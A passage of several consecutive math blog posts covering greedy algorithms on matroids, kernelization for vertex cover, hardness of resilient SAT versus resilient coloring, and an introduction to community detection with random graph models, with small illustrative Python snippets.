We need two things for this weight function to screw up the greedy algorithm. The first is that $w_1 < w_2 < w_3 < w_4$, so that greedy picks the elements in the order we want. Note that this means it’ll first pick all of $A \cap B$, and then all of $B - A$, and by assumption it won’t be able to pick anything from $A - B$, but since $B$ is assumed to be non-maximal, we have to pick at least one element from $X - (A \cup B)$ and pay $w_4$ for it.
So the second thing we want is that the cost of doing greedy is worse than picking any maximally independent set that contains $A$ (and we know that there has to be some maximal independent set containing $A$). In other words, if we call $m$ the size of a maximally independent set, we want
$\displaystyle |A \cap B| w_1 + |B-A|w_2 + (m - |B|)w_4 > |A \cap B|w_1 + |A-B|w_3 + (m-|A|)w_4$
This can be rearranged (using the fact that $|A| = |B|+1$) to
$\displaystyle w_4 > |A-B|w_3 - |B-A|w_2$
The point here is that the greedy picks too many elements of weight $w_4$, since if we were to start by taking all of $A$ (instead of all of $B$), then we could get by with one fewer. That might not be optimal, but it’s better than greedy and that’s enough for the proof.
So we just need to make $w_4$ large enough to make this inequality hold, while still maintaining $w_2 < w_3$. There are probably many ways to do this, and here’s one. Pick some $0 < \varepsilon < 1$, and set

$\displaystyle w_1 = 0, \quad w_2 = \frac{\varepsilon}{|B-A|}, \quad w_3 = \frac{1 + \varepsilon}{|A-B|}, \quad w_4 = 2$
It’s trivial that $w_1 < w_2$ and $w_3 < w_4$. For the rest we need some observations. First, the fact that $|A-B| = |B-A| + 1$ (together with $\varepsilon < 1$) implies that $w_2 < w_3$. Second, both $A-B$ and $B-A$ are nonempty: if $A - B$ were empty then $A \subset B$, contradicting $|A| = |B| + 1$, and if $B - A$ were empty then $B \subset A$, so augmenting $B$ with an element of $A$ would give a subset of $A$, which is independent by the second property of independence systems, contradicting our assumption. Using this, we can divide by these quantities to get
$\displaystyle w_4 = 2 > 1 = \frac{|A-B|(1 + \varepsilon)}{|A-B|} - \frac{|B-A|\varepsilon}{|B-A|}$
This proves the claim and finishes the proof.
$\square$
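As a quick sanity check (illustrative, not part of the proof), a few lines of Python can verify that the weights $w_1 = 0$, $w_2 = \varepsilon / |B-A|$, $w_3 = (1+\varepsilon)/|A-B|$, $w_4 = 2$ behave as claimed for several set sizes:

```python
# For several set sizes with |A| = |B| + 1, verify w1 < w2 < w3 < w4
# and the key inequality w4 > |A-B|*w3 - |B-A|*w2.
eps = 0.5
for b_minus_a in range(1, 6):      # |B - A| >= 1
    a_minus_b = b_minus_a + 1      # |A - B| = |B - A| + 1
    w1 = 0.0
    w2 = eps / b_minus_a
    w3 = (1 + eps) / a_minus_b
    w4 = 2.0
    assert w1 < w2 < w3 < w4
    assert w4 > a_minus_b * w3 - b_minus_a * w2  # reduces to 2 > 1
print("weight construction checks out")
```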
As a side note, we proved everything here with respect to minimizing the sum of the weights, but one can prove an identical theorem for maximization. The only part that’s really different is picking the clever weight function in part 2. In fact, you can convert between the two by defining a new weight function that subtracts the old weights from some fixed number $N$ that is larger than any of the original weights. So these two problems really are the same thing.
This is pretty amazing! So if you can prove your problem is a matroid then you have an awesome algorithm automatically. And if you run the greedy algorithm for fun and it seems like it works all the time, then that may be hinting that your problem is a matroid. This is one of the best situations one could possibly hope for.
But as usual, there are a few caveats to consider. They are both related to efficiency. The first is the black box algorithm for determining if a set is independent. In a problem like minimum spanning tree or finding independent columns of a matrix, there are polynomial time algorithms for determining independence. These two can both be done, for example, with Gaussian elimination. But there’s nothing to stop our favorite matroid from requiring an exponential amount of time to check if a set is independent. This makes greedy all but useless, since we need to check for independence many times in every round.
Another, perhaps subtler, issue is that the size of the ground set $X$ might be exponentially larger than the rank of the matroid. In other words, at every step our greedy algorithm needs to find a new element to add to the set it’s building up. But there could be such a huge ocean of candidates, all but a few of which break independence. In practice an algorithm might be working with $X$ implicitly, so we could still hope to solve the problem if we had enough knowledge to speed up the search for a new element.
There are still other concerns. For example, a naive approach to implementing greedy takes quadratic time, since you may have to look through every element of $X$ to find the minimum-cost guy to add. What if you just have to have faster runtime than $O(n^2)$? You can still be interested in finding more efficient algorithms that still perform perfectly, and to the best of my knowledge there’s nothing that says that greedy is the only exact algorithm for your favorite matroid. And then there are models where you don’t have direct/random access to the input, and lots of other ways that you can improve on greedy. But those stories are for another time.
Until then!
# Parameterizing the Vertex Cover Problem
I’m presenting a paper later this week at the Mathematical Foundations of Computer Science 2014 conference in Budapest, Hungary. This conference is an interesting mix of logic and algorithms that aims to bring together researchers from these areas to discuss their work. And right away the first session on the first day focused on an area I know is important but have little experience with: fixed parameter complexity. From what I understand it’s not that popular of a topic at major theory conferences in the US (there appears to be only one paper on it at this year’s FOCS conference), but the basic ideas are worth knowing.
The basic idea is pretty simple: some hard computational problems become easier (read, polynomial-time solvable) if you fix some parameters involved to constants. Preferably small constants. For example, finding cliques of size $k$ in a graph is NP-hard if $k$ is a parameter, but if you fix $k$ to a constant then you can check all possible subsets of size $k$ in $O(n^k)$ time. This is kind of a silly example because there are much faster ways to find triangles than checking all $O(n^3)$ subsets of vertices, but part of the point of fixed-parameter complexity is to find the fastest algorithms in these fixed-parameter settings. Since in practice parameters are often small [citation needed], this analysis can provide useful practical algorithmic alternatives to heuristics or approximate solutions.
One important tool in the theory of fixed-parameter tractability is the idea of a kernel. I think it’s an unfortunate term because it’s massively overloaded in mathematics, but the idea is to take a problem instance with the parameter $k$, and carve out “easy” regions of the instance (often reducing $k$ as you go) until the runtime of the trivial brute force algorithm only depends on $k$ and not on the size of the input. The point is that the solution you get on this “carved out” instance is either the same as the original, or can be extended back to the original with little extra work. There is a more formal definition we’ll state, but there is a canonical example that gives a great illustration.
Consider the vertex cover problem. That is, you give me a graph $G = (V,E)$ and a number $k$ and I have to determine if there is a subset of $\leq k$ vertices of $G$ that touch all of the edges in $E$. This problem is fixed-parameter tractable because, as with $k$-clique one can just check all subsets of size $k$. The kernel approach we’ll show now is much smarter.
What you do is the following. As long as your graph has a vertex of degree $> k$, you remove it and reduce $k$ by 1. This is because a vertex of degree $> k$ will always be chosen for a vertex cover. If it’s not, then you need to include all of its neighbors to cover its edges, but there are $> k$ neighbors and your vertex cover is constrained by size $k$. And so you can automatically put this high-degree vertex in your cover, and use induction on the smaller graph.
Once you can’t remove any more vertices there are two cases. In the case that there are more than $k^2$ edges, you output that there is no vertex cover. Indeed, if you only get $k$ vertices in your cover and you removed all vertices of degree $> k$, then each can cover at most $k$ edges, giving a total of at most $k^2$. Otherwise, if there are at most $k^2$ edges, then you can remove all the isolated vertices and show that there are only $\leq 2k^2$ vertices left. This is because each edge touches only two vertices, so in the worst case they’re all distinct. This smaller subgraph is called a kernel of the vertex cover, and the fact that its size depends only on $k$ is the key. So you can look at all $2^{2k^2} = O(1)$ subsets to determine if there’s a cover of the size you want. If you find a cover of the kernel, you add back in all the large-degree vertices you deleted and you’re done.
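Here's an illustrative Python sketch of this kernelization (the function name and the adjacency-set graph representation are my own choices):

```python
def kernelize_vertex_cover(adj, k):
    """Return (kernel_adj, k_left, forced) or None if no size-k cover exists.

    adj is a dict mapping each vertex to its set of neighbors.
    """
    adj = {v: set(ns) for v, ns in adj.items()}  # defensive copy
    forced = []  # high-degree vertices that must be in any cover
    changed = True
    while changed:
        changed = False
        for v in list(adj):
            if len(adj[v]) > k:          # degree > k: v is forced
                forced.append(v)
                for u in adj[v]:
                    adj[u].discard(v)
                del adj[v]
                k -= 1
                changed = True
                break
    num_edges = sum(len(ns) for ns in adj.values()) // 2
    if num_edges > k * k:
        return None                      # certainly no cover of this size
    adj = {v: ns for v, ns in adj.items() if ns}  # drop isolated vertices
    return adj, k, forced

# A star with 5 leaves plus one extra edge, k = 2: the center is forced.
star = {0: {1, 2, 3, 4, 5}, 1: {0}, 2: {0}, 3: {0}, 4: {0}, 5: {0, 6}, 6: {5}}
kernel, k_left, forced = kernelize_vertex_cover(star, 2)
print(forced, k_left, kernel)  # [0] 1 {5: {6}, 6: {5}}
```

After kernelization you'd brute-force the small remaining graph and add the forced vertices back to whatever cover you find.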
Now, even for small $k$ this is a pretty bad algorithm ($k=5$ gives $2^{50}$ subsets to inspect), but with more detailed analysis you can do significantly better. In particular, the best known bound reduces vertex cover to a kernel of size $2k - c \log(k)$ vertices for any constant $c$ you specify. Getting $\log(k)$ vertices is known to imply P = NP, and with more detailed complexity assumptions it’s even hard to get a graph with fewer than $O(k^{2-\varepsilon})$ edges for any $\varepsilon > 0$. These are all relatively recent results whose associated papers I have not read.
Even with these hardness results, there are two reasons why this kind of analysis is useful. The first is that it gives us a clearer picture of the complexity of these problems. In particular, the reduction we showed for vertex cover gives a time $O(2^{2k^2} + n + m)$-time algorithm, which you can then compare directly to the trivial $O(n^k)$ time brute force algorithm and measure the difference. Indeed, the kernelized approach is faster whenever $2^{2k^2} < n^k$, i.e. whenever $k < \frac{1}{2} \log_2(n)$.
The second reason is that the kernel approach usually results in simple and quick checks for negative answers to a problem. In particular, if you want to check for $k$-sized set covers in a graph in the real world, this analysis shows that the first thing you should do is check if the kernel has size $> k^2$. If so, you can immediately give a “no” answer. So useful kernels can provide insight into the structure of a problem that can be turned into heuristic tools even when it doesn’t help you solve the problem exactly.
So now let’s just see the prevailing definition of a “kernelization” of a problem. This comes from the text of Downey and Fellows.
Definition: A kernelization of a parameterized problem $L$ (formally, a language where each string $x$ is paired with a positive integer $k$) is a $\textup{poly}(|x|, k)$-time algorithm that converts instances $(x,k)$ into instances $(x', k')$ with the following three properties.
• $(x,k)$ is a yes instance of $L$ if and only if $(x', k')$ is.
• $|x'| \leq f(k)$ for some computable function $f: \mathbb{N} \to \mathbb{N}$.
• $k' \leq g(k)$ for some computable function $g: \mathbb{N} \to \mathbb{N}$.
The output $(x', k')$ is called a kernel, and the problem is said to admit a polynomial kernel if $f(k) = O(k^c)$ for some constant $c$.
So we showed that vertex cover admits a polynomial kernel (in fact, a quadratic one).
Now the nice theorem is that a problem is fixed-parameter tractable if and only if it admits a kernel (not necessarily a polynomial one). Finding a kernel is conceptually easier because, like in vertex cover, it allows you to introduce additional assumptions on the structure of the instances you’re working with. But more importantly from a theoretical standpoint, measuring the size and complexity of kernels for NP-hard problems gives us a way to discriminate among problems within NP. That and the chance to get some more practical tools for NP-hard problems makes parameterized complexity more interesting than it sounds at first.
Until next time!
# An Update on “Coloring Resilient Graphs”
A while back I announced a preprint of a paper on coloring graphs with certain resilience properties. I’m pleased to announce that it’s been accepted to the Mathematical Foundations of Computer Science 2014, which is being held in Budapest this year. Since we first published the preprint we’ve actually proved some additional results about resilience, and so I’ll expand some of the details here. I think it makes for a nicer overall picture, and in my opinion it gives a little more justification that resilient coloring is interesting, at least in contrast to other resilience problems.
## Resilient SAT
Recall that a “resilient” yes-instance of a combinatorial problem is one which remains a yes-instance when you add or remove some constraints. The way we formalized this for SAT was by fixing variables to arbitrary values. Then the question is how resilient does an instance need to be in order to actually find a certificate for it? In more detail,
Definition: $r$-resilient $k$-SAT formulas are satisfiable formulas in $k$-CNF form (conjunctions of clauses, where each clause is a disjunction of $k$ literals) such that for all choices of $r$ variables, every way to fix those variables yields a satisfiable formula.
For example, the following 3-CNF formula is 1-resilient:
$\displaystyle (a \vee b \vee c) \wedge (a \vee \overline{b} \vee \overline{c}) \wedge (\overline{a} \vee \overline{b} \vee c)$
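To double-check this, a brute-force script (exponential time, purely illustrative) can verify the claim, encoding the literal $a$ as the integer $1$, $\overline{a}$ as $-1$, and so on:

```python
from itertools import combinations, product

def satisfiable(clauses, num_vars, fixed):
    """Exhaustively search assignments consistent with `fixed` (var -> bool)."""
    for bits in product([False, True], repeat=num_vars):
        assign = {i + 1: b for i, b in enumerate(bits)}
        assign.update(fixed)  # fixed variables override the enumeration
        if all(any(assign[abs(l)] == (l > 0) for l in c) for c in clauses):
            return True
    return False

def is_r_resilient(clauses, num_vars, r):
    """Check every way of fixing r variables leaves the formula satisfiable."""
    for vs in combinations(range(1, num_vars + 1), r):
        for vals in product([False, True], repeat=r):
            if not satisfiable(clauses, num_vars, dict(zip(vs, vals))):
                return False
    return True

# (a or b or c) and (a or not b or not c) and (not a or not b or c)
phi = [[1, 2, 3], [1, -2, -3], [-1, -2, 3]]
print(is_r_resilient(phi, 3, 1))  # True
print(is_r_resilient(phi, 3, 3))  # False: no formula is k-resilient for k-SAT
```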
The idea is that resilience may impose enough structure on a SAT formula that it becomes easy to tell if it’s satisfiable at all. Unfortunately for SAT (though this is definitely not the case for coloring), there are only two possibilities. Either the instances are so resilient that they never existed in the first place (they’re vacuously trivial), or the instances are NP-hard. The first case is easy: there are no $k$-resilient $k$-SAT formulas. Indeed, if you’re allowed to fix $k$ variables to arbitrary values, then you can just pick a clause and set all its variables to false. So no formula can ever remain satisfiable under that condition.
The second case is when the resilience is strictly less than the clause size, i.e. $r$-resilient $k$-SAT for $0 \leq r < k$. In this case the problem of finding a satisfying assignment is NP-hard. We’ll show this via a sequence of reductions which start at 3-SAT, and they’ll involve two steps: increasing the clause size and resilience, and decreasing the clause size and resilience. The trick is in balancing which parts are increased and decreased. I call the first step the “blowing up” lemma, and the second part the “shrinking down” lemma.
## Blowing Up and Shrinking Down
Here’s the intuition behind the blowing up lemma. If you give me a regular (unresilient) 3-SAT formula $\varphi$, what I can do is make a copy of $\varphi$ with a new set of variables and OR the two things together. Call this $\varphi^1 \vee \varphi^2$. This is clearly logically equivalent to the original formula; if you give me a satisfying assignment for the ORed thing, I can just see which of the two clauses are satisfied and use that sub-assignment for $\varphi$, and conversely if you can satisfy $\varphi$ it doesn’t matter what truth values you choose for the new set of variables. And further you can transform the ORed formula into a 6-SAT formula in polynomial time. Just distribute the ORs across the ANDs (the distributive law).
Now the choice of a new set of variables is what gives us some resilience. If you fix one variable to the value of your choice, I can always just work with the other set of variables. Your manipulation doesn’t change the satisfiability of the ORed formula, because I’ve added all of this redundancy. So we took a 3-SAT formula and turned it into a 1-resilient 6-SAT formula.
The idea generalizes to the blowing up lemma, which says that you can measure the effects of a blowup no matter what you start with. More formally, if $s$ is the number of copies of variables you make, $k$ is the clause size of the starting formula $\varphi$, and $r$ is the resilience of $\varphi$, then blowing up gives you an $[(r+1)s - 1]$-resilient $(sk)$-SAT formula. The argument is almost identical to the example above; the resilience argument is just more general. Specifically, if you fix fewer than $(r+1)s$ variables, then the pigeonhole principle guarantees that one of the $s$ copies of variables has at most $r$ fixed values, and we can just work with that set of variables (i.e., this small part of the big ORed formula is satisfiable if $\varphi$ was $r$-resilient).
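Here's an illustrative sketch of the blow-up in Python, with literals again encoded as signed integers. Distributing the big OR over the ANDs produces one blown-up clause for each way of choosing one clause from each copy:

```python
from itertools import product

def blow_up(clauses, num_vars, s=2):
    """Make s disjoint variable copies of a CNF formula, OR them, and
    distribute OR over AND to land back in CNF (clauses of size s*k)."""
    copies = []
    for i in range(s):
        shift = i * num_vars  # copy i uses variables shifted by i*num_vars
        copies.append([[l + shift if l > 0 else l - shift for l in c]
                       for c in clauses])
    return [sum(choice, []) for choice in product(*copies)]

phi = [[1, 2, 3], [-1, 2, -3]]  # a 3-CNF formula over variables 1..3
psi = blow_up(phi, 3)           # a 6-CNF formula over variables 1..6
print(len(psi), len(psi[0]))    # 4 6: m^2 clauses of size 2k
```

Note the clause count multiplies (here $m^s$ clauses), which is why the full construction is careful to use only a constant number of blow-up steps.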
The shrinking down lemma is another trick that is similar to the reduction from $k$-SAT to 3-SAT. There you take a clause like $v \vee w \vee x \vee y \vee z$ and add new variables $z_i$ to break up the clause in to clauses of size 3 as follows:
$\displaystyle (v \vee w \vee z_1) \wedge (\neg z_1 \vee x \vee z_2) \wedge (\neg z_2 \vee y \vee z)$
These are equivalent because your choice of truth values for the $z_i$ tells me which of these sub-clauses to look for a true literal of the old variables. I.e. if you choose $z_1 = T, z_2 = F$ then the middle clause forces you to pick $x$ to be true. And it’s clear that if you’re willing to (at most) double the number of variables (a linear blowup) you can always get a $k$-clause down to an AND of 3-clauses.
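The standard splitting trick can be sketched in a few lines of Python (the signed-integer literal encoding is my own choice; fresh linking variables are numbered after the originals):

```python
def split_clause(clause, next_var):
    """Break one k-clause into an AND of 3-clauses via fresh variables."""
    if len(clause) <= 3:
        return [clause], next_var
    out = []
    rest = clause
    while len(rest) > 3:
        z = next_var
        next_var += 1
        out.append(rest[:2] + [z])   # (first two literals) or z
        rest = [-z] + rest[2:]       # not z or (the remaining literals)
    out.append(rest)
    return out, next_var

# Split (v or w or x or y or z), with variables 1..5 and fresh vars from 6.
clauses, _ = split_clause([1, 2, 3, 4, 5], next_var=6)
print(clauses)  # [[1, 2, 6], [-6, 3, 7], [-7, 4, 5]]
```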
So the shrinking down reduction does the same thing, except we only split clauses in half. For a clause $C$, call $C[:k/2]$ the first half of a clause and $C[k/2:]$ the second half (you can see how my Python training corrupts my notation preference). Then to shrink a clause $C_i$ down from size $k$ to size $\lceil k/2 \rceil + 1$ (1 for the new variable), add a variable $z_i$ and break $C_i$ into
$\displaystyle (C_i[:k/2] \vee z_i) \wedge (\neg z_i \vee C_i[k/2:])$
and just AND these together for all clauses. Call the original formula $\varphi$ and the transformed one $\psi$. The formulas are logically equivalent for the same reason that the $k$-to-3-SAT reduction works, and it’s already in the right CNF form. So resilience is all we have to measure. The claim is that the resilience is $q = \min(r, \lfloor k/2 \rfloor)$, where $r$ is the resilience of $\varphi$.
The reason for this is that if all the fixed variables are old variables (not $z_i$), then nothing changes and the resilience of the original $\varphi$ keeps us safe. And each $z_i$ we fix has no effect except to force us to satisfy a variable in one of the two halves. So there is this implication that if you fix a $z_i$ you have to also fix a regular variable. Because we can’t guarantee anything if we fix more than $r$ regular variables, we’d have to stop before fixing $r$ of the $z_i$. And because these new clauses have size $\lceil k/2 \rceil + 1$, we can’t do this more than $\lfloor k/2 \rfloor$ times or else we risk ruining an entire clause. This gives the definition of $q$, and proves the shrinking down lemma.
## Resilient SAT is always hard
The blowing up and shrinking down lemmas can be used to show that $r$-resilient $k$-SAT is NP-hard for all $r < k$. What we do is reduce from 3-SAT to an $r$-resilient $k$-SAT instance in such a way that the 3-SAT formula is satisfiable if and only if the transformed formula is resiliently satisfiable.
What makes these two lemmas work together is that shrinking down shrinks the clause size just barely less than the resilience, and blowing up increases resilience just barely more than it increases clause size. So we can combine these together to climb from 3-SAT up to some high resilience and clause size, and then iteratively shrink down until we hit our target.
One might worry that it will take an exponential number of reductions (or a few reductions of exponential size) to get from 3-SAT to the $(r,k)$ of our choice, but we have a construction that does it in at most four steps, with only a linear initial blowup from 3-SAT to $r$-resilient $3(r+1)$-SAT. Then, to deal with the odd ceilings and floors in the shrinking down lemma, you have to find a suitable larger $k$ to reduce to (by padding with useless variables, which cannot make the problem easier). And you choose this $k$ so that you only need at most two applications of shrinking down to get to $(k-1)$-resilient $k$-SAT. Our preprint has the gory details (which has an inelegant part that is not worth writing here), but in the end you show that $(k-1)$-resilient $k$-SAT is hard, and since that’s the maximal amount of resilience before the problem becomes vacuously trivial, all smaller resilience values are also hard.
## So how does this relate to coloring?
I’m happy about this result not just because it answers an open question I’m honestly curious about, but also because it shows that resilient coloring is more interesting. Basically this proves that satisfiability is so hard that no amount of resilience can make it easier in the worst case. But coloring has a gradient of difficulty. Once you get to order $k^2$ resilience for $k$-colorable graphs, the coloring problem can be solved efficiently by a greedy algorithm (and it’s not a vacuously empty class of graphs). Another thing on the side is that we use the hardness of resilient SAT to get the hardness results we have for coloring.
If you really want to stretch the implications, you might argue that this says something like “coloring is somewhat easier than SAT,” because we found a quantifiable axis along which SAT remains difficult while coloring crumbles. The caveat is that fixing colors of vertices is not exactly comparable to fixing values of truth assignments (since we are fixing lots of instances by fixing a variable), but at least it’s something concrete.
Coloring is still mostly open, and recently I’ve been going to talks where people are discussing startlingly similar ideas for things like Hamiltonian cycles. So that makes me happy.
Until next time!
# Community Detection in Graphs — a Casual Tour
Graphs are among the most interesting and useful objects in mathematics. Any situation or idea that can be described by objects with connections is a graph, and one of the most prominent examples of a real-world graph that one can come up with is a social network.
Recall, if you aren’t already familiar with this blog’s gentle introduction to graphs, that a graph $G$ is defined by a set of vertices $V$, and a set of edges $E$, each of which connects two vertices. For this post the edges will be undirected, meaning connections between vertices are symmetric.
One of the most common topics to talk about for graphs is the notion of a community. But what does one actually mean by that word? It’s easy to give an informal definition: a subset of vertices $C$ such that there are many more edges between vertices in $C$ than from vertices in $C$ to vertices in $V - C$ (the complement of $C$). Try to make this notion precise, however, and you open a door to a world of difficult problems and open research questions. Indeed, nobody has yet come to a conclusive and useful definition of what it means to be a community. In this post we’ll see why this is such a hard problem, and we’ll see that it mostly has to do with the word “useful.” In future posts we plan to cover some techniques that have found widespread success in practice, but this post is intended to impress upon the reader how difficult the problem is.
## The simplest idea
The simplest thing to do is to say a community is a subset of vertices which are completely connected to each other. In the technical parlance, a community is a subgraph which forms a clique. Sometimes an $n$-clique is also called a complete graph on $n$ vertices, denoted $K_n$. Here’s an example of a 5-clique in a larger graph:
“Where’s Waldo” for graph theorists: a clique hidden in a larger graph.
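Checking whether a given subset is a clique is easy; the hard part is finding a big one. Here's the brute-force search in Python, just to make the exponential blowup concrete (the adjacency-set representation is my own choice):

```python
from itertools import combinations

def is_clique(adj, vertices):
    """Every pair of vertices in the subset must be adjacent."""
    return all(v in adj[u] for u, v in combinations(vertices, 2))

def largest_clique(adj):
    """Try all subsets, largest first: exponential time in general."""
    vs = list(adj)
    for size in range(len(vs), 0, -1):
        for subset in combinations(vs, size):
            if is_clique(adj, subset):
                return subset
    return ()

# A triangle {0, 1, 2} with a pendant vertex 3 attached to 2.
adj = {0: {1, 2}, 1: {0, 2}, 2: {0, 1, 3}, 3: {2}}
print(largest_clique(adj))  # (0, 1, 2)
```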
Indeed, it seems reasonable that if we can reliably find communities at all, then we should be able to find cliques. But as fate should have it, this problem is known to be computationally intractable. In more detail, the problem of finding the largest clique in a graph is NP-hard. That essentially means we don’t have any better algorithms to find cliques in general graphs than to try all possible subsets of the vertices and check to see which, if any, form cliques. In fact it’s much worse: this problem is known to be hard to approximate to any reasonable factor in the worst case (the error of the approximation grows polynomially with the size of the graph!). So we can’t even hope to find a clique half the size of the biggest, or a thousandth the size!
But we have to take these impossibility results with a grain of salt: they only say things about the worst case graphs. And when we’re looking for communities in the real world, the worst case will never show up. Really, it won’t! In these proofs, “worst case” means that they encode some arbitrarily convoluted logic problem into a graph, so that finding the clique means solving the logic problem. To think that someone could engineer their social network to encode difficult logic problems is ridiculous.
So what about an “average case” graph? To formulate this typically means we need to consider graphs randomly drawn from a distribution.
## Random graphs
The simplest kind of “randomized” graph you could have is the following. You fix some set of vertices, and then run an experiment: for each pair of vertices you flip a coin, and if the coin is heads you place an edge and otherwise you don’t. This defines a distribution on graphs called $G(n, 1/2)$, which we can generalize to $G(n, p)$ for a coin with bias $p$. With a slight abuse of notation, we call $G(n, p)$ the Erdős–Rényi random graph (it’s not a graph but a distribution on graphs). We explored this topic from a more mathematical perspective earlier on this blog.
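Sampling from this distribution is a direct translation of the coin-flipping experiment (a sketch; the adjacency-set representation is my own choice):

```python
import random

def erdos_renyi(n, p, seed=None):
    """Sample a graph from G(n, p): one biased coin flip per vertex pair."""
    rng = random.Random(seed)
    adj = {v: set() for v in range(n)}
    for u in range(n):
        for v in range(u + 1, n):
            if rng.random() < p:  # the coin came up heads
                adj[u].add(v)
                adj[v].add(u)
    return adj

G = erdos_renyi(10, 0.5, seed=1)
num_edges = sum(len(ns) for ns in G.values()) // 2
print(num_edges)  # expected 22.5: 45 pairs, each present with probability 1/2
```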
So we can sample from this distribution and ask questions like: what’s the probability of the largest clique being size at least $20$? Indeed, cliques in Erdős–Rényi random graphs are so well understood that we know exactly how they work. For example, if $p=1/2$ then the size of the largest clique is guaranteed (with overwhelming probability as $n$ grows) to have size $k(n)$ or $k(n)+1$, where $k(n)$ is about $2 \log n$. Just as much is known about other values of $p$ as well as other properties of $G(n,p)$, see Wikipedia for a short list.
In other words, if we wanted to find the largest clique in an Erdős–Rényi random graph, we could check all subsets of size roughly $2\log(n)$, which would take about $(n / \log(n))^{\log(n)}$ time. This is pretty terrible, and I’ve never heard of an algorithm that does substantially better. In any case, it turns out that modeling networks with Erdős–Rényi random graphs, and communities with cliques, is far from realistic. There are many reasons why this is the case, but here’s one example that fits with the topic at hand. If I thought the world’s social network was distributed according to $G(n, 1/2)$ and communities were cliques, then I would be claiming that the largest community has size 65 or 66 (estimated world population: 7 billion, and $2 \log(7 \cdot 10^9) \sim 65$). Clearly this is ridiculous: there are groups of more than 66 people that we would want to call “communities,” and there are plenty of communities that don’t form bona-fide cliques.
Another avenue shows that things are still not as easy as they seem in Erdős–Rényi land. This is the so-called planted clique problem. That is, you draw a graph $G$ from $G(n, 1/2)$. You give $G$ to me and I pick a random but secret subset of $r$ vertices and I add enough edges to make those vertices form an $r$-clique. Then I ask you to find the $r$-clique. Clearly it doesn’t make sense when $r < 2 \log (n)$ because you won’t be able to tell it apart from the guaranteed cliques in $G$. But even worse, nobody knows how to find the planted clique when $r$ is even a little bit smaller than $\sqrt{n}$ (like, $r = n^{9/20}$ even). Just to solidify this with some numbers, we don’t know how to reliably find a planted clique of size 60 in a random graph on ten thousand vertices, but we do when the size of the clique goes up to 100. The best algorithms we know rely on some sophisticated tools in spectral graph theory, and their details are beyond the scope of this post.
So Erdős–Rényi graphs seem to have no hope. What’s next? There are a couple of routes we can take from here. We can try to change our random graph model to be more realistic. We can relax our notion of communities from cliques to something else. We can do both, or we can do something completely different.
## Other kinds of random graphs
There is an interesting model of Barabási and Albert, often called the “preferential attachment” model, that has been described as a good model of large, quickly growing networks like the internet. Here’s the idea: you start off with a two-clique $G = K_2$, and at each time step $t$ you add a new vertex $v$ to $G$, and new edges so that the probability that the edge $(v,w)$ is added to $G$ is proportional to the degree of $w$ (as a fraction of the total number of edges in $G$). Here’s an animation of this process:
Image source: Wikipedia
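A minimal sketch of the growth process (my simplification, not the general model: each new vertex attaches with a single edge, whereas Barabási–Albert usually adds several per step):

```python
import random

def preferential_attachment(n, seed=None):
    """Grow a graph from a 2-clique; each new vertex v picks an existing
    neighbor w with probability proportional to w's current degree."""
    rng = random.Random(seed)
    edges = [(0, 1)]
    endpoints = [0, 1]  # each vertex appears once per incident edge, so a
                        # uniform pick from this list is degree-biased
    for v in range(2, n):
        w = rng.choice(endpoints)
        edges.append((v, w))
        endpoints += [v, w]
    return edges
```

The `endpoints` list trick is the standard way to get degree-proportional sampling without recomputing degrees at every step.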
The significance of this random model is that it creates graphs with a small number of hubs, and a large number of low-degree vertices. In other words, the preferential attachment model tends to “make the rich richer.” Another perspective is that the degree distribution of such a graph is guaranteed to fit a so-called power-law distribution. Informally, this means that most vertices have small degree, while a few very high-degree hubs account for a significant fraction of the edges. This is sometimes called a “fat-tailed” distribution. Since power-law distributions are observed in a wide variety of natural settings, some have used this as justification for working in the preferential attachment setting. On the other hand, this model is known to have no significant community structure (by any reasonable definition, certainly not having cliques of nontrivial size), and this has been used as evidence against the model. I am not aware of any work done on planting dense subgraphs in graphs drawn from a preferential attachment model, but I think it’s likely to be trivial and uninteresting. Meanwhile, Bubeck et al. have looked at changing the initial graph (the “seed”) from a 2-clique to something else, and seeing how that affects the overall limiting distribution.
Another model that often shows up is one that allows you to build a random graph starting with any fixed degree distribution, not just a power law. There are a number of models that do this in some fashion, and you’ll hear a lot of hyphenated names thrown around like Chung-Lu and Molloy-Reed and Newman-Strogatz-Watts. The one we’ll describe is quite simple. Say you start with a set of vertices $V$, and a number $d_v$ for each vertex $v$, such that the sum of all the $d_v$ is even. This condition is required because in any graph the sum of the degrees of the vertices is twice the number of edges. Then you imagine each vertex $v$ having $d_v$ “edge-stubs.” The name suggests a picture like the one below:
Each node has a prescribed number of “edge stubs,” which are randomly connected to form a graph.
Now you pick two edge stubs at random and connect them. One usually allows self-loops and multiple edges between vertices, so that it’s okay to pick two edge stubs from the same vertex. You keep doing this until all the edge stubs are accounted for, and this is your random graph. The degrees were fixed at the beginning, so the only randomization is in which vertices are adjacent. The same obvious biases apply, that any given vertex is more likely to be adjacent to high-degree vertices, but now we get to control the biases with much more precision.
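The stub-matching process is short enough to sketch directly (my own code; one simplifying assumption is that pairing stubs by a single random shuffle is equivalent to repeatedly picking two stubs at random):

```python
import random
from collections import Counter

def configuration_model(degrees, seed=None):
    """Random graph with a fixed degree sequence: give vertex v exactly
    degrees[v] edge stubs, shuffle all stubs, and pair them off in order.
    Self-loops and multi-edges are allowed, as in the text."""
    assert sum(degrees) % 2 == 0, "degree sum must be even"
    stubs = [v for v, d in enumerate(degrees) for _ in range(d)]
    rng = random.Random(seed)
    rng.shuffle(stubs)
    return list(zip(stubs[0::2], stubs[1::2]))

edges = configuration_model([3, 3, 2, 2, 1, 1], seed=1)
```

By construction, every vertex ends up with exactly its prescribed degree (counting a self-loop twice); only the adjacency is random.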
The reason such a model is useful is that when you’re working with graphs in the real world, you usually have statistical information available. It’s simple to compute the degree of each vertex, and so you can use this random graph as a sort of “prior” distribution and look for anomalies. In particular, this is precisely how one of the leading measures of community structure works: the measure of modularity. We’ll talk about this in the next section.
## Other kinds of communities
Here’s one easy way to relax our notion of communities. Rather than finding complete subgraphs, we could ask about finding very dense subgraphs (ignoring what happens outside the subgraph). We compute density as the average degree of vertices in the subgraph.
If we impose no bound on the size of the subgraph an algorithm is allowed to output, then there is an efficient algorithm for finding the densest subgraph in a given graph. The general exact solution involves solving a linear programming problem and a little extra work, but luckily there is a greedy algorithm that can get within half of the optimal density. You start with all the vertices $S_n = V$, and remove any vertex of minimal degree to get $S_{n-1}$. Continue until $S_0$, and then compute the density of all the $S_i$. The best one is guaranteed to be at least half of the optimal density. See this paper of Moses Charikar for a more formal analysis.
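Here is a sketch of that greedy peeling procedure (my own code, following the description above, with density measured as average degree):

```python
def greedy_densest_subgraph(vertices, edges):
    """Charikar's greedy 2-approximation: repeatedly delete a minimum-degree
    vertex and remember the intermediate set with the best average degree."""
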